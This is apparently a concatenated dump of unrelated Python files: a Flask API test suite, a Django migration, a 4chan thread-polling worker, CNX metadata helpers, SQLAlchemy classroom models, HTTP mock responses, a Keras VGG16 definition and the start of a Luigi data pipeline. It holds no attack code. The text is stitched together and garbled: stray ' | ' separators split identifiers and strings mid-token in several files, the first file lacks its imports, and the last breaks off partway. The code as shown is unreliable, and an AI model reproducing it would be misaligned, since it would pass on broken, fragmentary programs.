# test helpers
from LudoboxTestCase import LudoboxTestCase
from helpers import delete_data_path, create_empty_data_path, add_samples_to_data_dir
class TestLudoboxWebServer(LudoboxTestCase):
def setUp(self):
# register routes
self.app.register_blueprint(rest_api)
# register a new user
rv = self.register(
email=self.user_email,
password=self.user_password
)
def test_home_status_code(self):
result = self.client.get('/')
# assert the status code of the response (redirected)
self.assertEqual(result.status_code, 200)
def test_api_show_home(self):
result = self.client.get('/api')
self.assertEqual(result.status_code, 200)
# self.assertEqual(json.loads(result.data), {"name" : self.config["ludobox_name"]})
def test_config_upload_allowed(self):
# self.login(email=self.user_email, password=self.user_password)
self.app.config["UPLOAD_ALLOWED"] = False
with self.client:
self.login()
result = self.client.post('/api/create',
data={},
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 401)
def test_add_game_forbidden(self):
"""Make sure only logged in user can add content"""
valid_info = self.borgia_info_content
delete_data_path(self.app.config["DAT | A_DIR"])
create_empty_data_path(self.app.config["DATA_DIR"])
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.app.test_client() as c:
result = c.post('/api/create',
data=data,
content_type='multipart/ | form-data'
)
print result.data
self.assertEqual(result.status_code, 403)
def test_api_create_content(self):
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
print result.data
self.assertEqual(result.status_code, 201)
res = json.loads(result.data)
self.assertIn("path", res.keys())
# load JSON info data
with open(os.path.join(res["path"], 'info.json'), 'r' )as f:
stored_info = json.load(f)
self.assertEquals(stored_info["title"], valid_info["title"])
# check for files
written_filenames = os.listdir(os.path.join(res["path"], 'files'))
self.assertEqual(written_filenames.sort(), [f[1] for f in data["files"]].sort())
def test_api_update_content(self):
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
print result.data
self.assertEqual(result.status_code, 201)
# make some changes
new_info = self.borgia_info_content.copy()
new_info["fab_time"] = 200
new_data = {
'info': json.dumps(new_info),
'slug': json.dumps(new_info["slug"])
}
# push changes to API
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
new_content = result.json["updated_content"]
self.assertEqual(result.status_code, 201)
self.assertEquals(new_content["fab_time"], 200 )
def test_api_update_content_non_existing_game(self):
with self.client:
self.login()
new_data = {
'info': json.dumps(self.borgia_info_content),
'slug': json.dumps("some-wrong-slug-")
}
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 404)
def test_save_history_with_user(self):
"""Make sure the reference to user is correctly saved in history"""
# create empy path for data
delete_data_path(self.tmp_path)
create_empty_data_path(self.tmp_path)
# load info without history
valid_info = self.borgia_info_content
data = {
'files': self.files,
'info': json.dumps(valid_info)
}
with self.client:
self.login()
# create the game through API
result = self.client.post('/api/create',
data=data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 201)
game_path = result.json["path"]
# get the game content
game_info = read_content(game_path)
# check history event content
self.assertEqual(len(game_info["history"]), 1)
event = game_info["history"][0]
self.assertEqual(event["type"], "create")
self.assertEqual(event["user"], self.user_email)
# make some changes to the data
new_info = valid_info.copy()
new_info["title"] = "bla bla bla"
# post the update
new_data = {
'info' : json.dumps(new_info),
'slug' : json.dumps(new_info["slug"])
}
result = self.client.post('/api/update',
data=new_data,
content_type='multipart/form-data'
)
self.assertEqual(result.status_code, 201)
# read updated game
game_path = result.json["path"]
new_game_info = read_content(game_path)
new_game_info["title"] = "bla bla bla"
# check history event content
self.assertEqual(len(new_game_info["history"]), 2)
event = new_game_info["history"][1]
self.assertEqual(event["type"], "update")
self.assertEqual(event["user"], self.user_email)
# def test_form_add_game(self):
# """Posting data and files using form should create a new game"""
#
# # delete everything first
# clean(OUTPUT_DIR)
#
# valid_info = read_content(os.path.join(os.getcwd(), 'server/tests/test-data/test-game'))
# data = {
# 'files': self.files,
# 'info': json.dumps(valid_info)
# }
#
# result = self.client.post('/addgame',
# data=data,
# content_type='multipart/form-data'
# )
#
# # redirect
# self.assertEqual(result.status_code, 302)
#
|
CMPUT404W17T06/CMPUT404-project | dash/migrations/0003_auto_20170313_0117.py | Python | apache-2.0 | 497 | 0.002012 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 01:17
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
|
class Migration(migrations.Migration):
dependencies = [
('dash', '0002_remove_post_origin'),
]
operations = [
migrations.AlterField(
model_name='comment',
name | ='id',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
]
|
ATRAN2/Futami | futami/ami.py | Python | gpl-2.0 | 7,977 | 0.001128 | # -*- coding: utf-8 -*-
from collections import defaultdict
from itertools import chain
from functools import wraps
from operator import itemgetter
from multiprocessing import (
current_process,
SimpleQueue,
Process,
)
from time import sleep
import logging
import sys
import traceback
from retrying import retry
import requests
from futami.common import (
Action,
BoardTarget,
SubscriptionUpdate,
StoredException,
Post,
ThreadTarget,
)
SLEEP_TIME = 3 # seconds
THREAD_LIST = "https://a.4cdn.org/{board}/threads.json"
THREAD = "https://a.4cdn.org/{board}/res/{thread}.json"
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def flatten(lst):
return chain.from_iterable(lst)
class Ami:
def __init__(self, request_queue, response_queue):
self.request_queue = request_queue
self.response_queue = response_queue
self.update_request_queue = SimpleQueue()
Process(
target=self.update_loop,
name='periodic api worker',
args=(response_queue, self.update_request_queue),
).start()
logger.debug("initialization complete")
self.request_loop()
def proxy_exception_to(instance_attribute_exception_proxy_queue):
def _proxy_exception(f):
"""This isn't your normal-looking function.
"""
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except BaseException as ex:
queue = getattr(self, instance_attribute_exception_proxy_queue)
tb = traceback.format_exc()
this_process = current_process()
queue.put(StoredException(tb, this_process.name))
return wrapper
return _proxy_exception
# Loop to handle fast part of LoadAndFollow and other requests from IRC
@proxy_exception_to("response_queue")
def request_loop(self):
# The identifier argument is an opaque
# identifier used by the queue client in some situations.
while True:
request = self.request_queue.get()
logger.debug("Got request {}".format(request))
if request.action is Action.LoadAndFollow:
if isinstance(request.target, BoardTarget):
# Download all threads
board = request.target.board
threads = self.get_board(board)
# Seed seen_boards so update_loop doesn't re-fetch them
self.update_request_queue.put(SubscriptionUpdate.make(
action=Action.InternalQueueUpdate,
target=request.target,
payload={thread['no']: thread['last_modified'] for thread in threads},
))
threads.sort(key=itemgetter('last_modified'))
# Download all thread content so we can get the OP
for thread in threads:
posts = list(self.get_thread(board, thread['no']))
op = posts[0]
op.payload = request.payload
self.response_queue.put(op)
elif isinstance(request.target, ThreadTarget):
posts = list(self.get_thread(
request.target.board,
request.target.thread
))
self.update_request_queue.put(SubscriptionUpdate.make(
action=Action.InternalQueueUpdate,
target=request.target,
payload=posts,
))
for post in posts:
post.payload = request.payload
self.response_queue.put(post)
@retry
def get_board(self, board):
url = THREAD_LIST.format(board=board)
pages = requests.get(url).json()
threads = list(flatten([page['threads'] for page in pages]))
return threads
@retry
def get_thread(self, board, thread):
url = THREAD.format(board=board, thread=thread)
posts = requests.get(url).json()['posts']
for post in posts:
post['board'] = board
posts = map(Post, posts)
return posts
# Timed loop to hit 4chan API
@proxy_exception_to("response_queue")
def update_loop(self, response_queue, update_request_queue):
# Set of boards that are watched
watched_boards = set()
# Dictionary of board => set of threads(string) that are watched
watched_threads = defaultdict(set)
# Dictionary of board => {thread_no => last_modified} last seen on board
seen_boards = defaultdict(dict)
# Dictionary of board, thread => posts last seen on thread
se | en_threads = defaultdict(lambda: defaultdict(list))
while True:
# Process pending update requests
| while not update_request_queue.empty():
request = update_request_queue.get()
if request.action is Action.InternalQueueUpdate:
if isinstance(request.target, BoardTarget):
watched_boards.add(request.target.board)
seen_boards[board] = request.payload
elif isinstance(request.target, ThreadTarget):
# assert request.target.board in watched_boards, "Asked to watch a thread of a board not currently being watched"
watched_threads[request.target.board].add(request.target.thread)
seen_threads[request.target.board][request.target.thread] = request.payload
# Fetch pending boards
pending_boards = defaultdict(dict)
for board in watched_boards:
pending_boards[board] = {
thread['no']:
thread['last_modified'] for thread in self.get_board(board)
}
to_delete = []
for board, threads in pending_boards.items():
for thread_no, last_modified in threads.items():
if thread_no not in seen_boards[board]:
thread = list(self.get_thread(board, thread_no))[0]
logger.debug("sending new thread {}".format(thread))
response_queue.put(thread)
elif last_modified > seen_boards[board][thread_no]:
thread = list(self.get_thread(board, thread_no))[0]
logger.debug("sending updated thread {}".format(thread))
response_queue.put(thread)
elif last_modified < seen_boards[board][thread_no]:
# Sometimes we get stale data immediately after reading
# it (tested under SLEEP_TIME = 3). Ignore this data.
to_delete.append((board, thread_no))
for board, thread_no in to_delete:
del pending_boards[board][thread_no]
seen_boards = pending_boards
# Fetch pending threads
pending_threads = defaultdict(lambda: defaultdict(list))
for board, threads in watched_threads.items():
for thread in threads:
pending_threads[board][thread] = list(self.get_thread(board, thread))
for board, threads in pending_threads.items():
for thread_no, posts in threads.items():
for post in posts:
if post not in seen_threads[board][thread_no]:
logger.debug("sending new post {}".format(post))
response_queue.put(post)
seen_threads = pending_threads
sleep(SLEEP_TIME)
|
Connexions/nebuchadnezzar | nebu/models/utils.py | Python | agpl-3.0 | 5,088 | 0 | from copy import copy
import json
from cnxepub.utils import squash_xml_to_text
from cnxml.parse import parse_metadata as parse_cnxml_metadata
from cnxtransforms import cnxml_abstract_to_html
from lxml import etree
__all__ = (
'convert_to_model_compat_metadata',
'scan_for_id_mapping',
'scan_for_uuid_mapping',
'build_id_to_uuid_mapping',
'id_from_metadata',
)
ACTORS_MAPPING_KEYS = (
# (<litezip name>, <cnx-epub name>),
('authors', 'authors'),
('licensors', 'copyright_holders'),
('maintainers', 'publishers'),
)
def _format_actors(actors):
"""Format the actors list of usernames to a cnx-epub compatable format"""
formatted_actors = []
for a in actors:
formatted_actors.append({'id': a, 'type': 'cnx-id', 'name': a})
return formatted_actors
def convert_to_model_compat_metadata(metadata):
"""\
Convert the metadata to cnx-epub model compatible metadata.
This creates a copy of the metadata. It does not mutate the given
metadata.
:param metadata: metadata
:type metadata: dict
:return: metadata
:rtype: dict
"""
md = copy(metadata)
md.setdefault('cnx-archive-shortid', None)
md.setdefault('cnx-archive-uri', '{}@{}'.format(md['id'], md['version']))
md.pop('id')
# FIXME cnx-epub has an issue rendering and parsing license_text set to
# None, so hard code it to 'CC BY' for now.
md.setdefault('license_text', 'CC BY')
md.setdefault('print_style', None)
md['derived_from_title'] = md['derived_from']['title']
md['derived_from_uri'] = md['derived_from']['uri']
md.pop('derived_from')
# Translate to a Person Info structure
for lz_key, epub_key in ACTORS_MAPPING_KEYS:
md[epub_key] = _format_actors(md.pop(lz_key))
md.setdefault('editors', [])
md.setdefault('illustrators', [])
md.setdefault('translators', [])
md['summary'] = md.pop('abstract')
md['summary'] = md['summary'] and md['summary'] or None
if md['summary'] is not None:
s = cnxml_abstract_to_html(md['summary'])
s = etree.fromstring(s)
md['summary'] = squash_xml_to_text(s, remove_namespaces=True)
return md
def id_from_metadata(metadata):
    """Return the content id recorded in *metadata*.

    The id lives under the ``cnx-archive-uri`` key; ``None`` when absent.
    """
    return metadata.get("cnx-archive-uri")
def scan_for_id_mapping(start_dir):
    """Collect a mapping of content ids to filepaths relative to the given
    directory (as ``start_dir``).

    This is necessary because the filesystem could be organized as
    a `book-tree`, which is a hierarchy of directories that are labeled
    by title rather than by id.

    :param start_dir: a directory to start the scan from
    :type start_dir: :class:`pathlib.Path`
    :return: mapping of content ids to the content filepath
    :rtype: {str: pathlib.Path, ...}

    """
    mapping = {}
    for filepath in start_dir.glob('**/index.cnxml'):
        with filepath.open('rb') as fb:
            xml = etree.parse(fb)
        md = convert_to_model_compat_metadata(parse_cnxml_metadata(xml))
        # Strip the '@version' suffix; only the bare id (e.g. 'm12345')
        # keys the mapping.  (Renamed from 'id' to avoid shadowing the
        # builtin.)
        content_id = id_from_metadata(md).split('@')[0]
        mapping[content_id] = filepath
    return mapping
def scan_for_uuid_mapping(start_dir):
    """Collect a mapping of content UUIDs to filepaths relative to the given
    directory (as ``start_dir``).

    This is similar to ``scan_for_id_mapping``, but instead of using the ID
    value found in CNXML as the key, we want the same mapping keyed by the
    UUID in the corresponding metadata.json file if it's available.

    :param start_dir: a directory to start the scan from
    :type start_dir: :class:`pathlib.Path`
    :return: mapping of content uuids to the content filepath
    :rtype: {str: pathlib.Path, ...}

    """
    mapping = {}
    for filepath in start_dir.glob('**/index.cnxml'):
        metadata_file = filepath.parent / 'metadata.json'
        if metadata_file.exists():
            with metadata_file.open('r') as metadata_json:
                metadata = json.load(metadata_json)
            uuid = metadata['id']
            mapping[uuid] = filepath
        else:
            # Fallback to trying CNXML for UUID metadata.  Use a context
            # manager so the file handle is closed (the original leaked
            # the handle returned by filepath.open()).
            with filepath.open() as fb:
                metadata = parse_cnxml_metadata(etree.parse(fb))
            uuid = metadata.get('uuid')
            if uuid:
                mapping[uuid] = filepath
    return mapping
def build_id_to_uuid_mapping(id_to_path_map, uuid_to_path_map):
    """Build a mapping of ID to UUID values based upon matching paths

    :param id_to_path_map: A mapping of IDs (m12345) to filepaths
    :type id_to_path_map: {str: pathlib.Path, ...}
    :param uuid_to_path_map: A mapping of UUIDs to filepaths
    :type uuid_to_path_map: {str: pathlib.Path, ...}
    :return: mapping of ids to uuids
    :rtype: {str: str, ...}
    """
    # Invert the UUID map (path string -> uuid), then look each ID's path
    # up in it; IDs whose path has no UUID entry map to None.
    inverse = {str(p): uuid for uuid, p in uuid_to_path_map.items()}
    return {
        content_id: inverse.get(str(p))
        for content_id, p in id_to_path_map.items()
    }
|
jaduff/goodstanding | goodstanding/models.py | Python | bsd-3-clause | 2,768 | 0.004335 | from sqlalchemy import (
Column,
Index,
Integer,
Text,
Table,
ForeignKey,
String,
Boolean,
DateTime,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
from zope.sqlalchemy import ZopeTransactionExtension
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
#class MyModel(Base):
# __tablename__ = 'models'
# id = Column(Integer, primary_key=True)
# name = Column(Text)
# value = Column(Integer)
# Association table linking gsClass rows to gsStudent rows (many-to-many).
gsClassStudent = Table('gsClassStudent',
    Base.metadata,
    Column('id', Integer, primary_key=True),
    Column('classid', Integer, ForeignKey('gsClass.id')),
    Column('studentid', Integer, ForeignKey('gsStudent.id'))
    )
class gsUser(Base):
    """A teacher/staff account; owns classes through ``myClasses``."""
    __tablename__ = 'gsUser'
    id = Column(Integer, primary_key=True)
    username = Column(String(120), index=True, unique=True)
    FirstName = Column(String(120), index=True, unique=False)
    LastName = Column(String(120), index=True, unique=False)
    # One-to-many: the gsClass rows whose teacherid points at this user.
    myClasses = relationship('gsClass', back_populates="teacher")
    def __repr__(self):
        return '<User %r>' % (self.username)
class gsStudent(Base):
    """A student record; ``id`` is assigned externally (autoincrement=False)."""
    __tablename__ = 'gsStudent'
    id = Column(Integer, primary_key=True, autoincrement=False)
    username = Column(String(64), index=True, unique=True)
    FirstName = Column(String(120), index=True, unique=False)
    LastName = Column(String(120), index=True, unique=False)
    cohort = Column(Integer, index=True, unique=False)
    current = Column(Boolean, default=False)
class gsClass(Base):
    """A class (group of students) taught by one gsUser in a calendar year."""
    __tablename__ = 'gsClass'
    id = Column(Integer, primary_key=True)
    classCode = Column(String(64), index=True, unique=False)
    cohort = Column(Integer, index=True, unique=False)
    #teacher = Column(String(120), index=True, unique=False)
    teacherid = Column(Integer, ForeignKey('gsUser.id'))
    teacher = relationship('gsUser', back_populates="myClasses")
    calendarYear = Column(Integer, index=True, unique=False)
    # Many-to-many to gsStudent through the gsClassStudent association
    # table.  (Restored 'gsStudent.id', mangled in the source text.)
    students = relationship('gsStudent',
        secondary=gsClassStudent,
        primaryjoin=(gsClassStudent.c.classid == id),
        secondaryjoin=(gsClassStudent.c.studentid == gsStudent.id),
        lazy='dynamic')
class gsClassNote(Base):
    """A dated note (with a numeric value) attached to one class-student link."""
    __tablename__ = 'gsClassNote'
    Noteid = Column(Integer, primary_key=True)
    classStudentid = Column(Integer, ForeignKey('gsClassStudent.id'))
    note = Column(Text, index=False, unique=False)
    value = Column(Integer, index=False)
    date = Column(DateTime, index=True)
|
NickMolloy/rt_api | tests/mock_api.py | Python | gpl-3.0 | 935 | 0.002139 | from httmock import all_requests
@all_requests
def non_json_episode_response(url, request):
    # Mock: 200 reply whose body is not JSON (content is None).
    return {'status_code': 200, 'content': None}
@all_requests
def unauthorized_episode_response(url, request):
    # Mock: 401 with an OAuth access-denied error body.
    return {'status_code': 401, 'content': '{"error": "access_denied", "error_message": "The resource owner or authorization server denied the request."}'}
@all_requests
def none_ok_episode_response(url, request):
    # Mock: 500 server error with an empty body.
    return {'status_code': 500, 'content': None}
@all_requests
def fail_get_token(url, request):
    # Mock: token request rejected with invalid_client (401).
    return {'status_code': 401, 'content': '{"error":"invalid_client","error_message":"Client authentication failed."}'}
@all_requests
def non_json_repsonse_for_authentication(url, request):
    # Mock: 500 reply with a non-JSON body during authentication.
    # NOTE(review): the 'repsonse' typo is kept; renaming would break callers.
    return {'status_code': 500, 'content': 'Something went wrong.'}
@all_requests
def test_forbidden_repsonse_for_authentication(url, request):
    # Mock: 403 access-denied reply during authentication.
    # (Restored the 'status_code' key, mangled in the source text.)
    return {'status_code': 403, 'content': '{"error": "access_denied"}'}
|
Southpaw-TACTIC/TACTIC | src/test/pipeline_test.py | Python | epl-1.0 | 143 | 0.013986 |
# Entry point: run the ProcessTest suite under a TACTIC Batch environment.
# (Restored the two import lines mangled in the source text.)
import tacticenv
import unittest

from pyasm.security import Batch

# Batch() must run before importing the test module (environment setup).
Batch()

from pyasm.biz.pipeline_test import ProcessTest

unittest.main()
|
cosmos342/VisionClassifier | vgg16.py | Python | mit | 8,410 | 0.005589 | # -*- coding: utf-8 -*-
"""VGG16 model for Keras.
# Reference
- [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from keras.models import Model
from keras.layers import Flatten, Dense, Input,Lambda
from keras.layers import Convolution2D, MaxPooling2D
from keras.engine.topology import get_source_inputs
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from keras import backend as K
import numpy as np
from keras.applications.imagenet_utils import decode_predictions, preprocess_input
#sandeep to fix later
#, _obtain_input_shape
TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
vgg_mean = np.array([123.68, 116.779, 103.939], dtype=np.float32).reshape((3,1,1))
def img_preprocess(x):
    # Subtract the per-channel VGG mean, then reverse axis 1 (the channel
    # axis in channels-first layout) -- presumably RGB -> BGR to match the
    # original Caffe VGG weights; TODO confirm.
    x = x - vgg_mean
    return x[:,::-1]
def VGG16(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
classes=1000):
"""Instantiate the VGG16 architecture,
optionally loading weights pre-trained
on ImageNet. Note that when using TensorFlow,
for best performance you should set
`image_dim_ordering="tf"` in your Keras config
at ~/.keras/keras.json.
The model and the weights are compatible with both
TensorFlow and Theano. The dimension ordering
convention used by the model is the one
specified in your Keras config file.
# Arguments
include_top: whether to include the 3 fully-connected
layers at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: opti | onal shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `tf` dim ordering)
or `(3, 224, 244)` (with `th` dim ordering).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 48.
E.g. `(200, 200, 3)` would be one valid value.
classes: optional number of classes to classify images
into, only to be s | pecified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
#input_shape = _obtain_input_shape(input_shape,
# default_size=224,
# min_size=48,
# dim_ordering=K.image_dim_ordering(),
# include_top=include_top)
# sandeep to fix later for now do this as topmodel is retained n theano
input_shape = (3,224,224)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# Block 1
print("sandeep adding lambda layer buddy good luck ")
x = Lambda(img_preprocess,input_shape=(3,224,224),output_shape=(3,224,224))(img_input)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(x)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
# Block 2
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x)
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
# Block 3
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
# Block 4
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
# Block 5
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
if include_top:
# Classification block
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu', name='fc1')(x)
x = Dense(4096, activation='relu', name='fc2')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name='vgg16')
# load weights
if weights == 'imagenet':
if K.image_dim_ordering() == 'th':
if include_top:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5',
TH_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
TH_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
if include_top:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_ |
hamasho/endojo | apps/games/listening/models.py | Python | gpl-3.0 | 4,489 | 0 | import os
import datetime
from datetime import timedelta
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from core.utils import date_range
class Package(models.Model):
    # A set of listening problems published together, at one difficulty level.
    title = models.CharField(max_length=200, unique=True)
    level = models.SmallIntegerField()
    pub_date = models.DateTimeField(default=timezone.now)
    class Meta:
        ordering = ['-pub_date']
    @staticmethod
    def get_package_list(user):
        """Return all packages (ordered by level, then title), each annotated
        with the given user's state ('Complete'/'Learning'/'Yet') and with
        tried/completed counts across all users."""
        packages = Package.objects.all().order_by('level', 'title')
        result = []
        for package in packages:
            try:
                state = PackageState.objects.get(
                    user=user,
                    package=package,
                )
                state = 'Complete' if state.complete else 'Learning'
            except PackageState.DoesNotExist:
                # No state row means the user never tried this package.
                state = 'Yet'
            n_tried = PackageState.objects.filter(
                package=package,
            ).count()
            n_completed = PackageState.objects.filter(
                package=package,
                complete=True,
            ).count()
            result.append({
                'id': package.id,
                'title': package.title,
                'level': package.level,
                'pub_date': package.pub_date,
                'state': state,
                'n_tried': n_tried,
                'n_completed': n_completed,
            })
        return result
def upload_directory(instance, filename):
    """Storage path for a Problem's audio file:
    ``listening_audio/<package id>/<basename of the uploaded file>``."""
    return 'listening_audio/%d/%s' % (
        instance.package.id, os.path.basename(filename))
class Problem(models.Model):
    # One listening question: prompt text plus an audio clip, in a Package.
    problem_text = models.CharField(max_length=200)
    package = models.ForeignKey(Package)
    audio_file = models.FileField(upload_to=upload_directory)
    level = models.SmallIntegerField()
class PackageState(models.Model):
    """
    A state which shows an user has completed the package or not.
    If `complete` is `True`, he/she has completed.
    If `false`, he/she tried but gave up.
    """
    # (Restored related_name='listening_packagestate_user', mangled in the
    # source text.)
    user = models.ForeignKey(User, related_name='listening_packagestate_user')
    package = models.ForeignKey(Package)
    complete = models.BooleanField(default=True)
    class Meta:
        unique_together = ('user', 'package')
class ProblemScore(models.Model):
    """Per-user result for one problem; completing updates History on save."""
    user = models.ForeignKey(User, related_name='listening_problemscore_user')
    problem = models.ForeignKey(Problem)
    # (Restored 'null=True)', mangled in the source text.)
    response_time_ms = models.IntegerField(null=True)
    complete = models.BooleanField(default=True)
    update_date = models.DateTimeField(default=timezone.now)
    class Meta:
        unique_together = ('user', 'problem')
    def save(self, *args, **kwargs):
        """
        When saving scores, also have to update History model.
        """
        if self.complete:
            today, created = History.objects.get_or_create(
                user=self.user,
                level=self.problem.level,
                date=datetime.date.today()
            )
            # Fold this response time into today's running average.
            # NOTE(review): this read-modify-write is racy under concurrent
            # saves; consider an F()-expression or select_for_update.
            avg = today.problem_count * today.average_time_ms
            today.problem_count += 1
            today.average_time_ms = \
                (avg + self.response_time_ms) / today.problem_count
            today.save()
        super(ProblemScore, self).save(*args, **kwargs)
class History(models.Model):
    # Daily per-level aggregate of one user's listening results.
    user = models.ForeignKey(User, related_name='listening_history_user')
    level = models.SmallIntegerField()
    problem_count = models.IntegerField(default=0)
    average_time_ms = models.IntegerField(default=0)
    date = models.DateField(auto_now_add=True)
    class Meta:
        ordering = ['date']
    @staticmethod
    def get_formatted_stats(user):
        """
        Format user's score data to fit Chart.js data structure
        """
        # One series per level (keys '1'..'5'); each series is a list of
        # {x: date, y: seconds} points.
        result = {
            '1': [],
            '2': [],
            '3': [],
            '4': [],
            '5': [],
        }
        histories = History.objects.filter(user=user)
        if len(histories) == 0:
            return result
        # Walk every calendar day between the first and last record
        # (records are ordered by date via Meta.ordering).
        start_date = histories[0].date
        end_date = histories[len(histories) - 1].date
        for date in date_range(start_date, end_date + timedelta(1)):
            histories_at = histories.filter(date=date)
            for history in histories_at:
                result[str(history.level)] += [{
                    'x': date,
                    'y': history.average_time_ms / 1000,
                }]
        return result
|
nanounanue/rita-pipeline | rita/pipelines/rita.py | Python | gpl-3.0 | 6,982 | 0.006307 | # coding: utf-8
"""
rita Pipeline
.. module:: rita
:synopsis: rita pipeline
.. moduleauthor:: Adolfo De Unánue <nanounanue@gmail.com>
"""
import os
import subprocess
from pathlib import Path
import boto3
import zipfile
import io
import csv
import datetime
import luigi
import luigi.s3
import pandas as pd
import sqlalchemy
from contextlib import closing
import requests
import re
from bs4 import BeautifulSoup
## Variables de ambiente
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
## Obtenemos las llaves de AWS
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
## Logging
import rita.config_ini
import logging
logger = logging.getLogger("rita.pipeline")
import rita.pipelines.utils
import rita.pipelines.common
from rita.pipelines.common.tasks import DockerTask
class ritaPipeline(luigi.WrapperTask):
    """
    Top-level wrapper task for the pipeline.
    """
    def requires(self):
        # Fan out to the catalog and data download sub-pipelines.
        yield DownloadRITACatalogs()
        yield DownloadRITAData()
class DownloadRITACatalogs(luigi.WrapperTask):
    """
    Scrape the BTS transtats field-selection page and yield one
    DownloadCatalog task per lookup-table link found on it.
    """
    def requires(self):
        baseurl = "https://www.transtats.bts.gov"
        url = "https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236"
        page = requests.get(url)
